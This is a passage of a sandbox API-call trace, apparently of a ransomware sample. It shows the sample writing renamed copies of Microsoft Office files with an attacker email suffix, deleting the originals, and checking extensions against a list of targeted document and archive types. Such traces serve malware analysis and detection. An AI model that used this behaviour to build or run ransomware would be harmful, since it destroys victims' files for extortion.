dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0273.488] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.488] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.974] GetLastError () returned 0x0 [0273.974] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0xfd68, lpOverlapped=0x0) returned 1 [0273.977] WriteFile (in: hFile=0x2ac, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xfd70, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xfd70, lpOverlapped=0x0) returned 1 [0273.978] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.978] WriteFile (in: hFile=0x2ac, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.978] SetEndOfFile (hFile=0x2ac) returned 1 [0273.978] CloseHandle (hObject=0x2ac) returned 1 [0273.979] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.979] SetEndOfFile (hFile=0x3c0) returned 1 [0273.981] CloseHandle (hObject=0x3c0) returned 1 [0273.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.983] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl")) returned 1 [0273.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.988] lstrlenW (lpString=".doc") returned 4 [0273.988] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0273.988] lstrlenW (lpString=".docx") returned 5 [0273.988] lstrcmpiW (lpString1=".docx", lpString2="N.VSL") returned -1 [0273.988] lstrlenW (lpString=".pdf") returned 4 [0273.988] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0273.988] lstrlenW (lpString=".xls") returned 4 [0273.988] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0273.988] lstrlenW (lpString=".xlsx") returned 5 [0273.988] lstrcmpiW (lpString1=".xlsx", lpString2="N.VSL") returned -1 [0273.989] lstrlenW (lpString=".ppt") returned 4 [0273.989] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0273.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.989] lstrlenW (lpString=".zip") returned 4 [0273.989] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0273.989] lstrlenW (lpString=".rar") returned 4 [0273.989] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0273.989] lstrlenW (lpString=".bz2") returned 4 [0273.989] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0273.989] lstrlenW (lpString=".7z") returned 3 [0273.989] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0273.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.989] lstrlenW (lpString=".dbf") returned 4 [0273.989] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0273.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.989] lstrlenW (lpString=".1cd") returned 4 [0273.989] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0273.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.989] lstrlenW (lpString=".jpg") returned 4 [0273.989] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0273.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.989] lstrlenW (lpString=".doc") returned 4 [0273.989] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0273.989] lstrlenW (lpString=".docx") returned 5 [0273.989] lstrcmpiW (lpString1=".docx", lpString2="N.VSL") returned -1 [0273.989] lstrlenW (lpString=".pdf") returned 4 [0273.989] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0273.989] lstrlenW (lpString=".xls") returned 4 [0273.989] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0273.990] lstrlenW (lpString=".xlsx") returned 5 [0273.990] lstrcmpiW (lpString1=".xlsx", lpString2="N.VSL") returned -1 [0273.990] lstrlenW (lpString=".ppt") returned 4 [0273.990] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0273.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.990] lstrlenW (lpString=".zip") returned 4 [0273.990] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0273.990] lstrlenW (lpString=".rar") returned 4 [0273.990] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0273.990] lstrlenW (lpString=".bz2") returned 4 [0273.990] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0273.990] lstrlenW (lpString=".7z") returned 3 [0273.990] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0273.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.990] lstrlenW (lpString=".dbf") returned 4 [0273.990] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0273.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.990] lstrlenW (lpString=".1cd") returned 4 [0273.990] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0273.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0273.990] lstrlenW (lpString=".jpg") returned 4 [0273.990] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0273.990] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".USA") returned -1 [0273.990] lstrlenW (lpString="GRINTL32.REST.IDX_DLL") returned 21 [0273.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0273.998] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=100224) returned 1 [0273.998] CloseHandle (hObject=0x3c0) returned 1 [0273.998] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll")) returned 0x20 [0274.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0274.057] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.057] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0274.057] GetLastError () returned 0x0 [0274.057] ReadFile (in: hFile=0x380, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x18780, lpOverlapped=0x0) returned 1 [0274.066] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x18790, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x18790, lpOverlapped=0x0) returned 1 [0274.067] ReadFile (in: hFile=0x380, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.068] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xfe, lpOverlapped=0x0) returned 1 [0274.068] SetEndOfFile (hFile=0x348) returned 1 [0274.068] CloseHandle (hObject=0x348) returned 1 [0274.068] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.068] SetEndOfFile (hFile=0x380) returned 1 [0274.071] CloseHandle (hObject=0x380) returned 1 [0274.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.071] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.rest.idx_dll")) returned 1 [0274.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.071] lstrlenW (lpString=".doc") returned 4 [0274.071] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0274.071] lstrlenW (lpString=".docx") returned 5 [0274.071] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0274.071] lstrlenW (lpString=".pdf") returned 4 [0274.071] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0274.071] lstrlenW (lpString=".xls") returned 4 [0274.071] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0274.072] lstrlenW (lpString=".xlsx") returned 5 [0274.072] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0274.072] lstrlenW (lpString=".ppt") returned 4 [0274.072] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0274.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.072] lstrlenW (lpString=".zip") returned 4 [0274.072] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0274.072] lstrlenW (lpString=".rar") returned 4 [0274.072] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0274.072] lstrlenW (lpString=".bz2") returned 4 [0274.072] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0274.072] lstrlenW (lpString=".7z") returned 3 [0274.072] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.072] lstrlenW (lpString=".dbf") returned 4 [0274.072] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0274.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.072] lstrlenW (lpString=".1cd") returned 4 [0274.072] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0274.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.072] lstrlenW (lpString=".jpg") returned 4 [0274.072] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0274.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.072] lstrlenW (lpString=".doc") returned 4 [0274.072] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0274.072] lstrlenW (lpString=".docx") returned 5 [0274.072] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0274.072] lstrlenW (lpString=".pdf") returned 4 [0274.072] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0274.072] lstrlenW (lpString=".xls") returned 4 [0274.072] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0274.073] lstrlenW (lpString=".xlsx") returned 5 [0274.073] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0274.073] lstrlenW (lpString=".ppt") returned 4 [0274.073] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0274.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.073] lstrlenW (lpString=".zip") returned 4 [0274.073] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0274.073] lstrlenW (lpString=".rar") returned 4 [0274.073] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0274.073] lstrlenW (lpString=".bz2") returned 4 [0274.073] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0274.073] lstrlenW (lpString=".7z") returned 3 [0274.073] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.073] lstrlenW (lpString=".dbf") returned 4 [0274.073] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0274.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.073] lstrlenW (lpString=".1cd") returned 4 [0274.073] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0274.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.REST.IDX_DLL") returned 69 [0274.073] lstrlenW (lpString=".jpg") returned 4 [0274.073] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0274.073] lstrcmpiW (lpString1=".VRD", lpString2=".USA") returned 1 [0274.073] lstrlenW (lpString="HVACDUCT.VRD") returned 12 [0274.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0274.074] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=1309) returned 1 [0274.074] CloseHandle (hObject=0x380) returned 1 [0274.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd")) returned 0x20 [0274.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0274.074] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.074] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0274.075] GetLastError () returned 0x0 [0274.075] ReadFile (in: hFile=0x380, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x51d, lpOverlapped=0x0) returned 1 [0274.077] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x520, lpOverlapped=0x0) returned 1 [0274.077] ReadFile (in: hFile=0x380, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.077] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.077] SetEndOfFile (hFile=0x348) returned 1 [0274.077] CloseHandle (hObject=0x348) returned 1 [0274.078] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.078] SetEndOfFile (hFile=0x380) returned 1 [0274.079] CloseHandle (hObject=0x380) returned 1 [0274.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.080] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd")) returned 1 [0274.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.080] lstrlenW (lpString=".doc") returned 4 [0274.080] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0274.080] lstrlenW (lpString=".docx") returned 5 [0274.080] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0274.080] lstrlenW (lpString=".pdf") returned 4 [0274.080] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0274.080] lstrlenW (lpString=".xls") returned 4 [0274.080] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0274.080] lstrlenW (lpString=".xlsx") returned 5 [0274.080] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0274.080] lstrlenW (lpString=".ppt") returned 4 [0274.080] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0274.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.080] lstrlenW (lpString=".zip") returned 4 [0274.080] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0274.080] lstrlenW (lpString=".rar") returned 4 [0274.080] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0274.080] lstrlenW (lpString=".bz2") returned 4 [0274.080] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0274.080] lstrlenW (lpString=".7z") returned 3 [0274.080] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0274.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.080] lstrlenW (lpString=".dbf") returned 4 [0274.081] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0274.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.081] lstrlenW (lpString=".1cd") returned 4 [0274.081] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0274.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.081] lstrlenW (lpString=".jpg") returned 4 [0274.081] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0274.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.081] lstrlenW (lpString=".doc") returned 4 [0274.081] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0274.081] lstrlenW (lpString=".docx") returned 5 [0274.081] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0274.081] lstrlenW (lpString=".pdf") returned 4 [0274.081] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0274.081] lstrlenW (lpString=".xls") returned 4 [0274.081] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0274.081] lstrlenW (lpString=".xlsx") returned 5 [0274.081] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0274.081] lstrlenW (lpString=".ppt") returned 4 [0274.081] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0274.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.081] lstrlenW (lpString=".zip") returned 4 [0274.081] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0274.081] lstrlenW (lpString=".rar") returned 4 [0274.081] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0274.081] lstrlenW (lpString=".bz2") returned 4 [0274.081] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0274.081] lstrlenW (lpString=".7z") returned 3 [0274.081] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0274.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.082] lstrlenW (lpString=".dbf") returned 4 [0274.082] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0274.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.082] lstrlenW (lpString=".1cd") returned 4 [0274.082] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0274.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60 [0274.082] lstrlenW (lpString=".jpg") returned 4 [0274.082] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0274.082] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0274.082] lstrlenW (lpString="INFINTL.DLL") returned 11 [0274.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0274.083] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=481168) returned 1 [0274.083] CloseHandle (hObject=0x348) returned 1 [0274.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infintl.dll")) returned 0x20 [0274.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.083] lstrlenW (lpString=".doc") returned 4 [0274.083] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.083] lstrlenW (lpString=".docx") returned 5 [0274.083] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0274.083] lstrlenW (lpString=".pdf") returned 4 [0274.083] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.083] lstrlenW (lpString=".xls") returned 4 [0274.083] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.084] lstrlenW (lpString=".xlsx") returned 5 [0274.084] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0274.084] lstrlenW (lpString=".ppt") returned 4 [0274.084] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 